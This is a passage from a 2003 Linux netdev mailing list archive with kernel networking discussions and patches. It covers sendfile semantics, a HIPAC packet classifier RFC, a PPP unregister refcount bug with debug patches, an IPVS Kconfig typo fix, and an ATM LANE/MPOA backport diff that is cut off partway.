netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev Alan Cox wrote: > Finally if you are streaming objects by non mapped references (eg > sendfile or see LM's paper from long ago on splice()) then the problem > goes away. As an aside, I really like sendfile's semantics except for * People occasionally want to add a receivefile(2). I disagree... 
sendfile(2) interface should really be considered a universal "fdcopy"
interface, regardless of what the 'to' and 'from' file descriptors are
attached to. File to socket. Socket to file. File to file. Socket to
socket. All should be supported, even if the fallback is a stupid (but
small!) in-kernel copy loop.

* Copy-until-EOF semantics are either undefined or unclear to me personally.

	Jeff

From acme@conectiva.com.br Sun Jul 13 22:52:55 2003
Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 22:53:01 -0700 (PDT)
Received: from orion.netbank.com.br (orion.netbank.com.br [200.203.199.90]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6E5qrFl024722 for ; Sun, 13 Jul 2003 22:52:54 -0700
Received: from [200.193.244.212] (helo=brinquendo.conectiva.com.br) by orion.netbank.com.br with asmtp (Exim 3.33 #1) id 19bwJn-0001xY-00; Mon, 14 Jul 2003 02:56:13 -0300
Received: by brinquendo.conectiva.com.br (Postfix, from userid 500) id 9B9251966D; Mon, 14 Jul 2003 05:53:55 +0000 (UTC)
Date: Mon, 14 Jul 2003 02:53:54 -0300
From: Arnaldo Carvalho de Melo
To: Matthew Wilcox
Cc: Jeff Garzik , netdev@oss.sgi.com, greearb@candelatech.com, "David S. Miller"
Subject: Re: [PATCH] netdev_ops
Message-ID: <20030714055354.GP3825@conectiva.com.br>
References: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> <3F0B2D30.4020102@candelatech.com> <20030708212551.GL1939@parcelfarce.linux.theplanet.co.uk> <20030708.150835.78728697.davem@redhat.com> <20030709161520.GW1939@parcelfarce.linux.theplanet.co.uk> <20030711193215.GH16037@gtf.org> <20030711200423.GL20424@parcelfarce.linux.theplanet.co.uk>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20030711200423.GL20424@parcelfarce.linux.theplanet.co.uk>
X-Url: http://advogato.org/person/acme
Organization: Conectiva S.A.
User-Agent: Mutt/1.5.4i X-archive-position: 4010 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: acme@conectiva.com.br Precedence: bulk X-list: netdev Em Fri, Jul 11, 2003 at 09:04:23PM +0100, Matthew Wilcox escreveu: > On Fri, Jul 11, 2003 at 03:32:15PM -0400, Jeff Garzik wrote: > > 1) The _ops are either too limited in scope, or too wide in scope. > > Couldn't agree more. I blame acme -- he wants me to push it to be much > wider in scope. Let's push _all_ the function pointers into netdev_ops. Hey, it was just a brainstorm session ;) Anyway, I'm heavily backlogged as I'm on a business trip for several days already, I'll try to read all this thread when I'm back home 8) - Arnaldo From nf@hipac.org Mon Jul 14 01:44:56 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 01:45:02 -0700 (PDT) Received: from indyio.rz.uni-saarland.de (indyio.rz.uni-saarland.de [134.96.7.3]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6E8isFl026852 for ; Mon, 14 Jul 2003 01:44:55 -0700 Received: from mars.rz.uni-saarland.de (mars.rz.uni-saarland.de [134.96.7.4]) by indyio.rz.uni-saarland.de (8.12.9/8.12.5) with ESMTP id h6E8ikqk2143996; Mon, 14 Jul 2003 10:44:46 +0200 (CEST) Received: from e002.stw.stud.uni-saarland.de (e002.stw.stud.uni-saarland.de [134.96.65.17]) by mars.rz.uni-saarland.de (8.9.3p2/8.8.4/8.8.2) with ESMTP id KAA8770343; Mon, 14 Jul 2003 10:44:45 +0200 (CEST) Received: from e002.stw.stud.uni-saarland.de ([134.96.65.138] helo=e123.stw.stud.uni-saarland.de) by e002.stw.stud.uni-saarland.de with esmtp (Exim 3.35 #1 (Debian)) id 19bywv-0006P0-00; Mon, 14 Jul 2003 10:44:45 +0200 From: Michael Bellion and Thomas Heinz Reply-To: nf@hipac.org To: linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: [RFC] High Performance Packet Classifiction for tc framework Date: Mon, 14 Jul 2003 10:45:40 +0200 User-Agent: KMail/1.5.2 MIME-Version: 1.0 Content-Type: 
text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Content-Disposition: inline Message-Id: <200307141045.40999.nf@hipac.org> X-archive-position: 4011 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: nf@hipac.org Precedence: bulk X-list: netdev Hi We are planning to port our HIPAC algorithm to the tc framework and we ask you for some comments about several issues. HIPAC is a novel packet classification framework which replaces the common linear approach with a more advanced data structure which offers highly efficient and locking friendly packet matching. Currently, people using lots of filters suffer from a big performance penalty. In contrast, HIPAC is able to handle thousands of filters without much slowdown compared to having no filters at all. There already exists one application of the HIPAC algorithm for the netfilter framework: nf-hipac. Details about the project can be found at our website http://www.hipac.org or our sourceforge project page at http://www.sourceforge.net/projects/nf-hipac Several performance tests of nf-hipac have been done so far (see our website) and have proven our claims. So it would be great if tc users could benefit from HIPAC too. Certainly, we'd like to know first whether HIPAC makes sense for the tc framework at all. From the nf-hipac worst case performance tests we know that our algorithm should be faster in all cases as soon as you have approx. 20 filters. Below 20 filters there is no difference between nf-hipac and the iptables filter table. So basically the question is: Are people using the tc framework with lots of filters? Some numbers would be helpful. Since we can only improve performance of u32 and fw filters it's also interesting whether such rulesets typically consist of those filters in the main. The tc framework is very flexible with respect to where filters can be attached. 
Unfortunately this cannot be mapped into one HIPAC data structure.
Our current design allows filters to be attached anywhere, but only the
filters attached to the top-level qdisc would benefit from the HIPAC
algorithm. Would this be a noticeable restriction?

Here is a short overview of the main design goals:
- new qdisc for HIPAC which is basically a container for the filters;
  it can only be attached as the top-level qdisc
- new HIPAC classifier which supports all native nf-hipac matches
  (src/dst ip, proto, src/dst port, ttl, state, in_iface, icmp type,
  tcpflags, fragments) and additionally fwmark
- the HIPAC classifier can only be attached to the HIPAC qdisc and,
  vice versa, the HIPAC qdisc only accepts HIPAC classifiers
- the HIPAC qdisc consists of a single class to which the "next" qdisc
  must be attached
- the HIPAC classifier can contain a number of existing classifiers
  (u32, fw, route, rsvp, tcindex) with the following semantics:
  a HIPAC classifier matches if the native matches and also each of the
  embedded classifiers match; the returned tcf_result is the one from
  the final classifier (=> intermediate classifiers are reduced to a
  match)
- it is still possible to attach non-hipac classifiers to other qdiscs
  and classes

Regards,

+-----------------------+----------------------+
|   Michael Bellion     |     Thomas Heinz     |
|                       |                      |
+-----------------------+----------------------+

From rol@as2917.net Mon Jul 14 02:16:17 2003
Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 02:16:25 -0700 (PDT)
Received: from tag.witbe.net (IDENT:root@tag.witbe.net [81.88.96.48]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6E9GFFl027874 for ; Mon, 14 Jul 2003 02:16:17 -0700
Received: from fifi (APuteaux-102-1-4-243.w193-253.abo.wanadoo.fr [193.253.233.243]) by tag.witbe.net (8.11.0/8.11.0) with ESMTP id h6E9G4p22542; Mon, 14 Jul 2003 09:16:04 GMT
From: "Paul Rolland"
To: "'Stephen Hemminger'" , ,
Cc: ,
Subject: Re: [BUG]: problem when shutting down ppp connection since 2.5.70
Date: Mon, 14 Jul 2003 11:16:04 +0200 Message-ID: <017701c349e8$8dfeeb40$2101a8c0@witbe> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.4510 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 In-Reply-To: <20030709114334.5b8cf7c6.shemminger@osdl.org> Importance: Normal X-archive-position: 4012 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: rol@as2917.net Precedence: bulk X-list: netdev Hello, I've applied the patch from Stephen on top of the 2.6.0-test1 kernel, and here is the result : Jul 14 10:57:01 donald kernel: dst route cache has 0 references Jul 14 10:57:01 donald kernel: unregister_netdevice: waiting for tap0 to become free. Usage count = -3 Jul 14 10:57:10 donald kernel: dst route cache has 0 references Jul 14 10:57:10 donald kernel: unregister_netdevice: waiting for tap0 to become free. Usage count = -3 Jul 14 10:57:20 donald kernel: dst route cache has 0 references Jul 14 10:57:20 donald kernel: unregister_netdevice: waiting for tap0 to become free. Usage count = -3 Jul 14 10:57:31 donald kernel: dst route cache has 0 references Jul 14 10:57:31 donald kernel: unregister_netdevice: waiting for tap0 to become free. Usage count = -3 This is a big change compared to 2.5.74 (.75 not tested). I guess a negative usage count should be considered as valid by unregister_netdevice. 
What about : --- dev.c 2003-07-14 11:13:23.000000000 +0200 +++ dev.c.orig 2003-07-14 11:13:01.000000000 +0200 @@ -2746,7 +2746,7 @@ unsigned long rebroadcast_time, warning_time; rebroadcast_time = warning_time = jiffies; - while (atomic_read(&dev->refcnt) > 0) { + while (atomic_read(&dev->refcnt) != 0) { if (time_after(jiffies, rebroadcast_time + 1 * HZ)) { rtnl_shlock(); rtnl_exlock(); Regards, Paul ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ REHAB is for quitters. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Paul Rolland, rol@witbe.net Witbe.net SA Directeur Associe -- Please no HTML, I'm not a browser - Pas d'HTML, je ne suis pas un navigateur "Some people dream of success... while others wake up and work hard at it" > -----Original Message----- > From: Stephen Hemminger [mailto:shemminger@osdl.org] > Sent: Wednesday, July 09, 2003 8:44 PM > To: Paul Rolland; cfriesen@nortelnetworks.com; paulus@samba.org > Cc: linux-ppp@vger.kernel.org; netdev@oss.sgi.com > Subject: Re: [BUG]: problem when shutting down ppp connection > since 2.5.70 > > > The problem is that some protocol is still holding a reference to the > device. This is a bug in the protocol, and needs to be fixed (ie not a > ppp bug). > > Try building a kernel with only IPv4, eliminate all others then add > back until you find the culprit. > > The following patch may help also. 
>
> diff -Nru a/net/core/dev.c b/net/core/dev.c
> --- a/net/core/dev.c	Wed Jul  9 11:40:56 2003
> +++ b/net/core/dev.c	Wed Jul  9 11:40:56 2003
> @@ -72,6 +72,8 @@
>   *	- netif_rx() feedback
>   */
>
> +#define DEBUG 1
> +
>  #include
>  #include
>  #include
> @@ -2704,6 +2706,8 @@
>  	goto out;
>  }
>
> +extern void dst_dumpref(const struct net_device *dev);
> +
>  static void netdev_wait_allrefs(struct net_device *dev)
>  {
>  	unsigned long rebroadcast_time, warning_time;
> @@ -2740,6 +2744,30 @@
>  		current->state = TASK_RUNNING;
>
>  		if (time_after(jiffies, warning_time + 10 * HZ)) {
> +#ifdef DEBUG
> +			dst_dumpref(dev);
> +
> +			if (dev->atalk_ptr)
> +				printk(KERN_INFO "unregister_netdevice: "
> +				       " %s: probably in use as AppleTalk device\n", dev->name);
> +			if (dev->ip_ptr)
> +				printk(KERN_INFO "unregister_netdevice: "
> +				       " %s: probably in use as IPv4 device\n", dev->name);
> +
> +			if (dev->dn_ptr)
> +				printk(KERN_INFO "unregister_netdevice: "
> +				       " %s: probably in use as DECnet device\n", dev->name);
> +			if (dev->ip6_ptr)
> +				printk(KERN_INFO "unregister_netdevice: "
> +				       " %s: probably in use as IPv6 device\n", dev->name);
> +
> +			if (dev->ec_ptr)
> +				printk(KERN_INFO "unregister_netdevice: "
> +				       " %s: probably in use as Econet device\n", dev->name);
> +			if (dev->ax25_ptr)
> +				printk(KERN_INFO "unregister_netdevice: "
> +				       " %s: probably in use as AX.25 device\n", dev->name);
> +#endif
>  			printk(KERN_EMERG "unregister_netdevice: "
>  			       "waiting for %s to become free.
Usage " > "count = %d\n", > diff -Nru a/net/core/dst.c b/net/core/dst.c > --- a/net/core/dst.c Wed Jul 9 11:40:56 2003 > +++ b/net/core/dst.c Wed Jul 9 11:40:56 2003 > @@ -41,6 +41,21 @@ > static struct timer_list dst_gc_timer = > TIMER_INITIALIZER(dst_run_gc, 0, DST_GC_MIN); > > + > +void dst_dumpref(const struct net_device *dev) > +{ > + struct dst_entry *dst; > + int count = 0; > + > + spin_lock_bh(&dst_lock); > + for (dst = dst_garbage_list; dst; dst = dst->next) { > + if (dst->dev == dev) ++count; > + } > + spin_unlock_bh(&dst_lock); > + > + printk(KERN_INFO "dst route cache has %d references\n", > count); } > + > static void dst_run_gc(unsigned long dummy) > { > int delayed = 0; > From rol@as2917.net Mon Jul 14 04:44:02 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 04:44:11 -0700 (PDT) Received: from tag.witbe.net (IDENT:root@tag.witbe.net [81.88.96.48]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6EBi1Fl010775 for ; Mon, 14 Jul 2003 04:44:02 -0700 Received: from fifi (APuteaux-102-1-4-243.w193-253.abo.wanadoo.fr [193.253.233.243]) by tag.witbe.net (8.11.0/8.11.0) with ESMTP id h6EBhqp13963; Mon, 14 Jul 2003 11:43:52 GMT From: "Paul Rolland" To: "'Paul Rolland'" , "'Stephen Hemminger'" , , Cc: , Subject: Re: [BUG]: problem when shutting down ppp connection since 2.5.70 Date: Mon, 14 Jul 2003 13:43:51 +0200 Message-ID: <018201c349fd$330a6a60$2101a8c0@witbe> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.4510 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 In-Reply-To: Importance: Normal X-archive-position: 4013 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: rol@as2917.net Precedence: bulk X-list: netdev Hello, I'm sorry, the patch was not complete, it should have considered the BUG_ON too... 
Here is one that is fine on my system : --- dev.c.orig 2003-07-14 13:41:33.000000000 +0200 +++ dev.c 2003-07-14 13:34:27.000000000 +0200 @@ -2742,7 +2742,7 @@ unsigned long rebroadcast_time, warning_time; rebroadcast_time = warning_time = jiffies; - while (atomic_read(&dev->refcnt) != 0) { + while (atomic_read(&dev->refcnt) > 0) { if (time_after(jiffies, rebroadcast_time + 1 * HZ)) { rtnl_shlock(); rtnl_exlock(); @@ -2836,7 +2836,7 @@ dev->reg_state = NETREG_UNREGISTERED; netdev_wait_allrefs(dev); - BUG_ON(atomic_read(&dev->refcnt)); + BUG_ON(atomic_read(&dev->refcnt) > 0); netdev_finish_unregister(dev); break; Still don't understand why refcnt is really bad (negative value), but at least the machine is working... Paul ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I have a vitally important role serving as a bad example. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From albertogli@telpin.com.ar Mon Jul 14 07:03:10 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 07:03:18 -0700 (PDT) Received: from mail.telpin.com.ar (mail.telpin.com.ar [200.43.18.243]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6EE38Fl021526 for ; Mon, 14 Jul 2003 07:03:09 -0700 Received: from telpin.com.ar (host213.200-43-231.telecom.net.ar [200.43.231.213]) by mail.telpin.com.ar (8.12.9/8.12.1) with SMTP id h6EE3snt016542; Mon, 14 Jul 2003 11:03:55 -0300 Date: Mon, 14 Jul 2003 11:03:50 -0300 From: Alberto Bertogli To: netdev@oss.sgi.com Cc: linux-net@vger.kernel.org, linux-kernel@vger.kernel.org Subject: [PATCH] IPVS' Kconfig LBLC and LBLCR configuration typo Message-ID: <20030714140350.GB1389@telpin.com.ar> Mail-Followup-To: Alberto Bertogli , netdev@oss.sgi.com, linux-net@vger.kernel.org, linux-kernel@vger.kernel.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.5.4i X-RAVMilter-Version: 8.4.2(snapshot 20021217) (mail) X-archive-position: 4014 X-ecartis-version: Ecartis 
v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: albertogli@telpin.com.ar Precedence: bulk X-list: netdev Hi there! The following patch fixes what looks like a typo in ipvs' Kconfig (net/ipv4/ipvs/Kconfig). Both the IP_VS_LBLC and IP_VS_LBLCR schedulings have the same tristate line (well, not the same, IP_VS_LBLCR's has a 'g' missing at the end): tristate "locality-based least-connection with replication scheduling" But it looks like LBLC should be "locality-based least-connection scheduling" and LBLCR "locality-based least-connection with replication scheduling". Thanks, Alberto --- Kconfig.orig 2003-07-14 10:32:06.000000000 -0300 +++ Kconfig 2003-07-14 10:32:57.000000000 -0300 @@ -147,7 +147,7 @@ unsure, say N. config IP_VS_LBLC - tristate "locality-based least-connection with replication scheduling" + tristate "locality-based least-connection scheduling" depends on IP_VS ---help--- The locality-based least-connection scheduling algorithm is for @@ -163,7 +163,7 @@ unsure, say N. 
config IP_VS_LBLCR - tristate "locality-based least-connection with replication schedulin" + tristate "locality-based least-connection with replication scheduling" depends on IP_VS ---help--- The locality-based least-connection with replication scheduling From jgarzik@pobox.com Mon Jul 14 07:09:49 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 07:09:53 -0700 (PDT) Received: from www.linux.org.uk (IDENT:M/qbtNfsDWHJio/1VYO4Aw0UMjqCI23V@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6EE9lFl022342 for ; Mon, 14 Jul 2003 07:09:48 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19b4xb-0006rs-6O; Fri, 11 Jul 2003 21:57:43 +0100 Message-ID: <3F0F24B1.5050200@pobox.com> Date: Fri, 11 Jul 2003 16:57:21 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: Matthew Wilcox CC: netdev@oss.sgi.com Subject: Re: [PATCH] Move eth_mac_addr and eth_change_mtu References: <20030711181946.GG20424@parcelfarce.linux.theplanet.co.uk> <20030711182330.GC16037@gtf.org> <20030711182530.GH20424@parcelfarce.linux.theplanet.co.uk> In-Reply-To: <20030711182530.GH20424@parcelfarce.linux.theplanet.co.uk> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4015 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev Matthew Wilcox wrote: > On Fri, Jul 11, 2003 at 02:23:30PM -0400, Jeff Garzik wrote: > >>On Fri, Jul 11, 2003 at 07:19:46PM +0100, Matthew Wilcox wrote: >> >>>Move eth_mac_addr() and eth_change_mtu() from drivers/net/net_init.c >>>to net/ethernet/eth.c >> >>Why? It's not used outside of net_init.c AFAICS. 
> > > Preparation for the next stage of netdev_ops Well, I don't see/understand this next-stage, so elaboration would be nice. As-is, I do not support merging this patch. Jeff From chas@locutus.cmf.nrl.navy.mil Mon Jul 14 11:01:33 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 11:01:50 -0700 (PDT) Received: from ginger.cmf.nrl.navy.mil (ginger.cmf.nrl.navy.mil [134.207.10.161]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6EI1WFl027535 for ; Mon, 14 Jul 2003 11:01:32 -0700 Received: from locutus.cmf.nrl.navy.mil (locutus.cmf.nrl.navy.mil [134.207.10.66]) by ginger.cmf.nrl.navy.mil (8.12.7/8.12.7) with ESMTP id h6EGWgsG016111; Mon, 14 Jul 2003 12:32:42 -0400 (EDT) Received: (from chas@localhost) by locutus.cmf.nrl.navy.mil (8.12.7/8.12.7/Submit) id h6EGUDmZ007717; Mon, 14 Jul 2003 12:30:14 -0400 Date: Mon, 14 Jul 2003 12:30:14 -0400 From: chas williams Message-Id: <200307141630.h6EGUDmZ007717@locutus.cmf.nrl.navy.mil> To: davem@redhat.com Subject: [PATCH][2.4] more atm backports for 2.4 Cc: netdev@oss.sgi.com X-Spam-Score: () hits=0.4 X-Virus-Scanned: NAI Completed X-Scanned-By: MIMEDefang 2.30 (www . roaringpenguin . com / mimedefang) X-archive-position: 4019 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: chas@cmf.nrl.navy.mil Precedence: bulk X-list: netdev [atm]: cleanup lane and mpoa module interface # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. 
# This patch includes the following deltas: # ChangeSet 1.1015 -> 1.1016 # net/atm/lec.c 1.16 -> 1.17 # net/atm/mpc.h 1.1 -> 1.2 # net/atm/mpc.c 1.8 -> 1.9 # net/atm/proc.c 1.8 -> 1.9 # net/atm/lec.h 1.4 -> 1.5 # net/atm/common.c 1.17 -> 1.18 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/06/27 chas@relax.cmf.nrl.navy.mil 1.1016 # cleanup lane and mpoa module interface # -------------------------------------------- # diff -Nru a/net/atm/common.c b/net/atm/common.c --- a/net/atm/common.c Mon Jun 30 13:21:44 2003 +++ b/net/atm/common.c Mon Jun 30 13:21:44 2003 @@ -33,21 +33,61 @@ #include #include "lec.h" #include "lec_arpc.h" -struct atm_lane_ops atm_lane_ops; -#endif -#ifdef CONFIG_ATM_LANE_MODULE +struct atm_lane_ops *atm_lane_ops; +static DECLARE_MUTEX(atm_lane_ops_mutex); + +void atm_lane_ops_set(struct atm_lane_ops *hook) +{ + down(&atm_lane_ops_mutex); + atm_lane_ops = hook; + up(&atm_lane_ops_mutex); +} + +int try_atm_lane_ops(void) +{ + down(&atm_lane_ops_mutex); + if (atm_lane_ops && try_inc_mod_count(atm_lane_ops->owner)) { + up(&atm_lane_ops_mutex); + return 1; + } + up(&atm_lane_ops_mutex); + return 0; +} + +#if defined(CONFIG_ATM_LANE_MODULE) || defined(CONFIG_ATM_MPOA_MODULE) EXPORT_SYMBOL(atm_lane_ops); +EXPORT_SYMBOL(try_atm_lane_ops); +EXPORT_SYMBOL(atm_lane_ops_set); +#endif #endif #if defined(CONFIG_ATM_MPOA) || defined(CONFIG_ATM_MPOA_MODULE) #include #include "mpc.h" -struct atm_mpoa_ops atm_mpoa_ops; -#endif +struct atm_mpoa_ops *atm_mpoa_ops; +static DECLARE_MUTEX(atm_mpoa_ops_mutex); + +void atm_mpoa_ops_set(struct atm_mpoa_ops *hook) +{ + down(&atm_mpoa_ops_mutex); + atm_mpoa_ops = hook; + up(&atm_mpoa_ops_mutex); +} + +int try_atm_mpoa_ops(void) +{ + down(&atm_mpoa_ops_mutex); + if (atm_mpoa_ops && try_inc_mod_count(atm_mpoa_ops->owner)) { + up(&atm_mpoa_ops_mutex); + return 1; + } + up(&atm_mpoa_ops_mutex); + return 0; +} #ifdef CONFIG_ATM_MPOA_MODULE EXPORT_SYMBOL(atm_mpoa_ops); 
-#ifndef CONFIG_ATM_LANE_MODULE -EXPORT_SYMBOL(atm_lane_ops); +EXPORT_SYMBOL(try_atm_mpoa_ops); +EXPORT_SYMBOL(atm_mpoa_ops_set); #endif #endif @@ -734,27 +774,40 @@ ret_val = -EPERM; goto done; } - if (atm_lane_ops.lecd_attach == NULL) - atm_lane_init(); - if (atm_lane_ops.lecd_attach == NULL) { /* try again */ +#if defined(CONFIG_ATM_LANE_MODULE) + if (!atm_lane_ops) + request_module("lec"); +#endif + if (try_atm_lane_ops()) { + error = atm_lane_ops->lecd_attach(vcc, (int) arg); + __MOD_DEC_USE_COUNT(atm_lane_ops->owner); + if (error >= 0) + sock->state = SS_CONNECTED; + ret_val = error; + } else ret_val = -ENOSYS; - goto done; - } - error = atm_lane_ops.lecd_attach(vcc, (int)arg); - if (error >= 0) sock->state = SS_CONNECTED; - ret_val = error; goto done; case ATMLEC_MCAST: - if (!capable(CAP_NET_ADMIN)) + if (!capable(CAP_NET_ADMIN)) { ret_val = -EPERM; - else - ret_val = atm_lane_ops.mcast_attach(vcc, (int)arg); + goto done; + } + if (try_atm_lane_ops()) { + ret_val = atm_lane_ops->mcast_attach(vcc, (int) arg); + __MOD_DEC_USE_COUNT(atm_lane_ops->owner); + } else + ret_val = -ENOSYS; goto done; case ATMLEC_DATA: - if (!capable(CAP_NET_ADMIN)) + if (!capable(CAP_NET_ADMIN)) { ret_val = -EPERM; - else - ret_val = atm_lane_ops.vcc_attach(vcc, (void*)arg); + goto done; + } + if (try_atm_lane_ops()) { + ret_val = atm_lane_ops->vcc_attach(vcc, (void *) arg); + __MOD_DEC_USE_COUNT(atm_lane_ops->owner); + } else + ret_val = -ENOSYS; goto done; #endif #if defined(CONFIG_ATM_MPOA) || defined(CONFIG_ATM_MPOA_MODULE) @@ -763,21 +816,29 @@ ret_val = -EPERM; goto done; } - if (atm_mpoa_ops.mpoad_attach == NULL) - atm_mpoa_init(); - if (atm_mpoa_ops.mpoad_attach == NULL) { /* try again */ +#if defined(CONFIG_ATM_MPOA_MODULE) + if (!atm_mpoa_ops) + request_module("mpoa"); +#endif + if (try_atm_mpoa_ops()) { + error = atm_mpoa_ops->mpoad_attach(vcc, (int) arg); + __MOD_DEC_USE_COUNT(atm_mpoa_ops->owner); + if (error >= 0) + sock->state = SS_CONNECTED; + ret_val = error; + } 
else ret_val = -ENOSYS; - goto done; - } - error = atm_mpoa_ops.mpoad_attach(vcc, (int)arg); - if (error >= 0) sock->state = SS_CONNECTED; - ret_val = error; goto done; case ATMMPC_DATA: - if (!capable(CAP_NET_ADMIN)) + if (!capable(CAP_NET_ADMIN)) { ret_val = -EPERM; - else - ret_val = atm_mpoa_ops.vcc_attach(vcc, arg); + goto done; + } + if (try_atm_mpoa_ops()) { + ret_val = atm_mpoa_ops->vcc_attach(vcc, arg); + __MOD_DEC_USE_COUNT(atm_mpoa_ops->owner); + } else + ret_val = -ENOSYS; goto done; #endif #if defined(CONFIG_ATM_TCP) || defined(CONFIG_ATM_TCP_MODULE) @@ -1162,40 +1223,6 @@ } -/* - * lane_mpoa_init.c: A couple of helper functions - * to make modular LANE and MPOA client easier to implement - */ - -/* - * This is how it goes: - * - * if xxxx is not compiled as module, call atm_xxxx_init_ops() - * from here - * else call atm_mpoa_init_ops() from init_module() within - * the kernel when xxxx module is loaded - * - * In either case function pointers in struct atm_xxxx_ops - * are initialized to their correct values. 
Either they - * point to functions in the module or in the kernel - */ - -extern struct atm_mpoa_ops atm_mpoa_ops; /* in common.c */ -extern struct atm_lane_ops atm_lane_ops; /* in common.c */ - -#if defined(CONFIG_ATM_MPOA) || defined(CONFIG_ATM_MPOA_MODULE) -void atm_mpoa_init(void) -{ -#ifndef CONFIG_ATM_MPOA_MODULE /* not module */ - atm_mpoa_init_ops(&atm_mpoa_ops); -#else - request_module("mpoa"); -#endif - - return; -} -#endif - #if defined(CONFIG_ATM_LANE) || defined(CONFIG_ATM_LANE_MODULE) #if defined(CONFIG_BRIDGE) || defined(CONFIG_BRIDGE_MODULE) struct net_bridge_fdb_entry *(*br_fdb_get_hook)(struct net_bridge *br, @@ -1206,18 +1233,8 @@ EXPORT_SYMBOL(br_fdb_put_hook); #endif /* defined(CONFIG_ATM_LANE_MODULE) || defined(CONFIG_BRIDGE_MODULE) */ #endif /* defined(CONFIG_BRIDGE) || defined(CONFIG_BRIDGE_MODULE) */ +#endif /* defined(CONFIG_ATM_LANE) || defined(CONFIG_ATM_LANE_MODULE) */ -void atm_lane_init(void) -{ -#ifndef CONFIG_ATM_LANE_MODULE /* not module */ - atm_lane_init_ops(&atm_lane_ops); -#else - request_module("lec"); -#endif - - return; -} -#endif static int __init atm_init(void) { diff -Nru a/net/atm/lec.c b/net/atm/lec.c --- a/net/atm/lec.c Mon Jun 30 13:21:44 2003 +++ b/net/atm/lec.c Mon Jun 30 13:21:44 2003 @@ -11,6 +11,7 @@ /* We are ethernet device */ #include #include +#include #include #include #include @@ -56,8 +57,6 @@ unsigned char *addr); extern void (*br_fdb_put_hook)(struct net_bridge_fdb_entry *ent); -static spinlock_t lec_arp_spinlock = SPIN_LOCK_UNLOCKED; - #define DUMP_PACKETS 0 /* 0 = None, * 1 = 30 first bytes * 2 = Whole packet @@ -71,9 +70,9 @@ static int lec_close(struct net_device *dev); static struct net_device_stats *lec_get_stats(struct net_device *dev); static void lec_init(struct net_device *dev); -static __inline__ struct lec_arp_table* lec_arp_find(struct lec_priv *priv, +static inline struct lec_arp_table* lec_arp_find(struct lec_priv *priv, unsigned char *mac_addr); -static __inline__ int 
